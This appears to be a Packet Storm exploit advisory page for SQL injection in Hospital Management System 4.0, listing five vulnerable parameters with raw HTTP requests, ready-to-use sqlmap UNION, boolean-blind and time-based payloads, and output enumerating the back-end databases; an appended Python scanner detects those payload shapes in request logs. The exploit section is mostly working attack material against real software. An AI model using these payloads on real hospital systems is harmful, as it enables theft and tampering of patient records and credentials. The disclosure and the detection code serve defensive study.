Hospital Management System 4.0 searchdata SQL Injection

02 Jan 2020 00:00:00, reported by FULLSHADE. Type: packetstorm. Source: packetstormsecurity.com

Hospital Mgmt System 4.0 SQL Injection Vulnerability

```text
# Exploit Title: Hospital Management System 4.0 - 'searchdata' SQL Injection
# Google Dork: N/A
# Date: 2020-01-02
# Exploit Author: FULLSHADE
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/hospital-management-system-in-php/
# Version: v4.0
# Tested on: Windows
# CVE : N/A

# The Hospital Management System 4.0 web application is vulnerable to
# SQL injection in multiple areas, listed below are 5 of the prominent
# and easy to exploit areas.

================================ 1 - SQLi ================================

POST /hospital/hospital/hms/doctor/search.php HTTP/1.1
Host: 10.0.0.214
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
Origin: https://10.0.0.214
DNT: 1
Connection: close
Referer: https://10.0.0.214/hospital/hospital/hms/doctor/search.php
Cookie: PHPSESSID=301tn3sqt3gmimkc9epe7kjha5
Upgrade-Insecure-Requests: 1

searchdata=&search=

?searchdata parameter is vulnerable to SQL injection under the search feature in the doctor login.

POST parameter 'searchdata' is vulnerable.
sqlmap identified the following injection point(s) with a total of 120 HTTP(s) requests:
---
Parameter: searchdata (POST)
Type: UNION query
Title: Generic UNION query (NULL) - 11 columns
Payload: searchdata=' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(CONCAT('qvxbq','zIuFTDXhtLrbZmAXQXxIalrRpZgCjsPnduKboFfW'),'qpqjq'),NULL-- PqeG&search=
---
[15:49:58] [INFO] testing MySQL
[15:49:58] [INFO] confirming MySQL
[15:49:58] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.41, PHP 7.4.1
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[15:49:58] [INFO] fetching database names
available databases [6]:
[*] hms
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] test

================================ 2 - SQLi ================================

GET parameter 'viewid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 40 HTTP(s) requests:
---
Parameter: viewid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: viewid=6' AND 3413=3413 AND 'nBkv'='nBkv

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: viewid=6' AND SLEEP(5) AND 'PJim'='PJim

Type: UNION query
Title: Generic UNION query (NULL) - 11 columns
Payload: viewid=6' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162767071,0x7957464b6f4a78624b536a75497051715a71587353746a4b6e45716441646345614f725449555748,0x717a717a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- XNyp

[15:54:21] [INFO] fetching database names
available databases [6]:
[*] hms
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] test

GET /hospital/hospital/hms/doctor/view-patient.php?viewid=6 HTTP/1.1
Host: 10.0.0.214
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: PHPSESSID=301tn3sqt3gmimkc9epe7kjha5
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

?viewid parameter is vulnerable to SQLi while viewing a patient under the doctor login

================================ 3 - SQLi ================================

Parameter: bs (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: bp=123&bs=123' AND SLEEP(5) AND 'CKbI'='CKbI&weight=123&temp=123&pres=123&submit=

?bs parameter is vulnerable to SQL injection on the doctors login when adding medical history to a patient

================================ 4 - SQLi ================================

POST /hospital/hospital/hms/doctor/add-patient.php HTTP/1.1
Host: 10.0.0.214
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://10.0.0.214/hospital/hospital/hms/doctor/add-patient.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 111
Origin: https://10.0.0.214
DNT: 1
Connection: close
Cookie: PHPSESSID=301tn3sqt3gmimkc9epe7kjha5
Upgrade-Insecure-Requests: 1

patname=

patname parameter is vulnerable to SQLi under the add patient in the doctor login

================================ 5 - SQLi ================================

---
Parameter: cpass (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: cpass=123' AND 4808=4808#&npass=123&cfpass=123&submit=123

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: cpass=123' AND SLEEP(5)-- taxP&npass=123&cfpass=123&submit=123
---
available databases [6]:
[*] hms
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] test

POST /hospital/hospital/hms/admin/change-password.php HTTP/1.1
Host: 10.0.0.214
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
Origin: http://10.0.0.214
DNT: 1
Connection: close
Referer: http://10.0.0.214/hospital/hospital/hms/admin/change-password.php
Cookie: PHPSESSID=g1mpom762nglpeptn51b4rg5h5
Upgrade-Insecure-Requests: 1

cpass=123&npass=123&cfpass=123&submit=123

the ?cpass parameter is vulnerable to blind SQL injection
```
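As an added detection example (not part of the advisory or the vendor's code), a small Python scanner that walks constructed request-log lines for the HMS endpoints listed above and flags the three payload shapes sqlmap reported there: a quote followed by UNION ALL SELECT NULL, a SLEEP(n) time-based probe, and a numeric tautology such as AND 3413=3413. The log format, the mapping of endpoints to parameters, and the medical-history path (the advisory gives none) are assumptions; it presumes a proxy or WAF log that records POST bodies, which plain access logs do not.

```python
import re
from urllib.parse import parse_qs

# Endpoints and parameters named in the advisory above (constructed mapping, not from the app).
WATCHED = {
    "/hospital/hospital/hms/doctor/search.php": {"searchdata"},
    "/hospital/hospital/hms/doctor/view-patient.php": {"viewid"},
    "/hospital/hospital/hms/doctor/add-patient.php": {"patname"},
    "/hospital/hospital/hms/admin/change-password.php": {"cpass", "npass", "cfpass"},
}
# The advisory gives no path for the medical-history form, so 'bs' is matched on any HMS path.
ANY_PATH_PARAMS = {"bs"}

# Payload shapes taken from the sqlmap output quoted in the advisory.
SIGNATURES = [
    ("union-null", re.compile(r"'\s*union\s+all\s+select\s+null", re.I)),
    ("time-based", re.compile(r"\bsleep\s*\(\s*\d+\s*\)", re.I)),
    ("boolean-tautology", re.compile(r"\band\s+(\d+)\s*=\s*\1\b", re.I)),
]

def scan_line(line):
    """Constructed log shape: 'METHOD PATH QUERY_OR_BODY' (one request per line).
    Returns (path, parameter, signature) for each watched parameter carrying a known shape."""
    parts = line.strip().split(" ", 2)
    if len(parts) != 3:
        return []
    _method, path, data = parts
    if not path.startswith("/hospital/"):
        return []
    params = WATCHED.get(path, set()) | ANY_PATH_PARAMS
    hits = []
    # parse_qs decodes %xx and '+' for us, so the regexes see the plaintext payload.
    for name, values in parse_qs(data, keep_blank_values=True).items():
        if name not in params:
            continue
        for value in values:
            for label, rx in SIGNATURES:
                if rx.search(value):
                    hits.append((path, name, label))
    return hits

def scan(lines):
    return [hit for line in lines for hit in scan_line(line)]

# Constructed sample: the advisory's sqlmap payloads, form-encoded, mixed with benign traffic.
SAMPLE_LOG = [
    "POST /hospital/hospital/hms/doctor/search.php searchdata=smith&search=",
    "POST /hospital/hospital/hms/doctor/search.php searchdata='+UNION+ALL+SELECT+NULL,NULL,NULL--+PqeG&search=",
    "GET /hospital/hospital/hms/doctor/view-patient.php viewid=6",
    "GET /hospital/hospital/hms/doctor/view-patient.php viewid=6'+AND+3413=3413+AND+'nBkv'='nBkv",
    "POST /hospital/hospital/hms/doctor/history-placeholder.php bp=123&bs=123'+AND+SLEEP(5)+AND+'CKbI'='CKbI",
    "POST /hospital/hospital/hms/admin/change-password.php cpass=123'+AND+4808=4808%23&npass=123&cfpass=123",
]
```

Running `scan(SAMPLE_LOG)` yields one hit per injected request and none for the two benign lines.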

Vulners AI Score: 0.4 (Low risk)